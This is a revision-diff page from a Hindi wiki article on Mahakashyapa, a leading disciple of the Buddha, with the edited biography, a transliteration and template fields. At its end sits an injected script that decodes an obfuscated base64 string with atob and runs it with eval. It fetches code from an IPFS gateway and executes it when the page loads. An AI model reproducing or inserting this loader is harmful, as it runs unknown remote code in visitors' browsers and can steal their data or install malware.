Difference between revisions of "महाकाच्यायन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{बौद्ध दर्शन2}}" to "{{बौद्ध धर्म}}")
Line 1: Line 1:
'''महाकश्यप / महाकाच्चयन / Mahakashyap / Mahakachyayn'''<br />
+
'''महाकाच्चयन ( महाकश्यप, माहाकाश्यप, महाकास्यप आदि भी)''' महाकाच्चयन अथवा महाकश्यप [[बुद्ध]] के प्रमुख छात्रों में से एक थे। भगवान बुद्ध की मृत्यु के बाद [[बौद्ध]] संघ की पहली सभा के लिए सभापति के रूप में महाकश्यप को चुना गया । उन्हें बौद्ध धर्म के ज़ेन शाखा का पहला प्रधान भी माना जाता है। वे बुद्ध के एकमात्र ऐसे छात्र थे जिनके साथ भगवान बुद्ध ने वस्त्रों का आदान-प्रदान किया था। बुद्ध ने बहुत बार महाकश्यप की बड़ाई भी की थी और महाकश्यप को अपने बराबर का दर्जा दिया था। महाकश्यप कपिल नाम के ब्राह्मण और उनकी पत्नी सुमनदेवी के पुत्र के रूप में [[मगध]] में पैदा हुए। वे काफ़ी धन दौलत सुख सुविधाओं के बीच बड़े हुए। उनके न चाहते हुए भी उनका विवाह कर दिया गया। अपने माता पिता कि मृत्यु के बाद कुछ समय तक उन्होंने अपनी पत्नी के साथ अपने माता पिता के धन दौलत को सम्भाला, लेकिन कुछ समय बाद उन दोनों ने सन्यासी बनने का फ़ैसला कर लिया। वे दोनों बुद्ध के अनुयायी बन गये।
  
महाकश्यप [[बुद्ध]] के प्रमुख छात्रों में से एक थे। भगवान बुद्ध की मृत्यु के बाद [[बौद्ध]] संघ की पहली सभा के लिए सभापति के रूप में महाकश्यप को चुना गया । उन्हें बौद्ध धर्म के ज़ेन (Zen) शाखा का पहला प्रधान भी माना जाता है। वे बुद्ध के एकमात्र ऐसे छात्र थे जिनके साथ भगवान बुद्ध ने वस्त्रों का आदान-प्रदान किया था। बुद्ध ने बहुत बार महाकश्यप की बड़ाई भी की थी और महाकश्यप को अपने बराबर का दर्जा दिया था। महाकश्यप कपिल नाम के ब्राह्मण और उनकी पत्नी सुमनदेवी के पुत्र के रूप में [[मगध]] में पैदा हुए। वे काफ़ी धन दौलत सुख सुविधाओं के बीच बड़े हुए । उनके न चाहते हुए भी उनका विवाह कर दिया गया। अपने माता पिता कि मृत्यु के बाद कुछ समय तक उन्होंने अपनी पत्नी के साथ अपने माता पिता के धन दौलत को सम्भाला, लेकिन कुछ समय बाद उन दोनों ने सन्यासी बनने का फ़ैसला कर लिया। वे दोनों बुद्ध के अनुयायी बन गये।
 
{{प्रचार}}
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=

Revision as of 12:28, 6 May 2012

mahakachchayan ( mahakashyap, mahakashyap, mahakasyap adi bhi) mahakachchayan athava mahakashyap buddh ke pramukh chhatroan mean se ek the. bhagavan buddh ki mrityu ke bad bauddh sangh ki pahali sabha ke lie sabhapati ke roop mean mahakashyap ko chuna gaya . unhean bauddh dharm ke zen shakha ka pahala pradhan bhi mana jata hai. ve buddh ke ekamatr aise chhatr the jinake sath bhagavan buddh ne vastroan ka adan-pradan kiya tha. buddh ne bahut bar mahakashyap ki b daee bhi ki thi aur mahakashyap ko apane barabar ka darja diya tha. mahakashyap kapil nam ke brahman aur unaki patni sumanadevi ke putr ke roop mean magadh mean paida hue. ve kafi dhan daulat sukh suvidhaoan ke bich b de hue. unake n chahate hue bhi unaka vivah kar diya gaya. apane mata pita ki mrityu ke bad kuchh samay tak unhoanne apani patni ke sath apane mata pita ke dhan daulat ko sambhala, lekin kuchh samay bad un donoan ne sanyasi banane ka faisala kar liya. ve donoan buddh ke anuyayi ban gaye.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>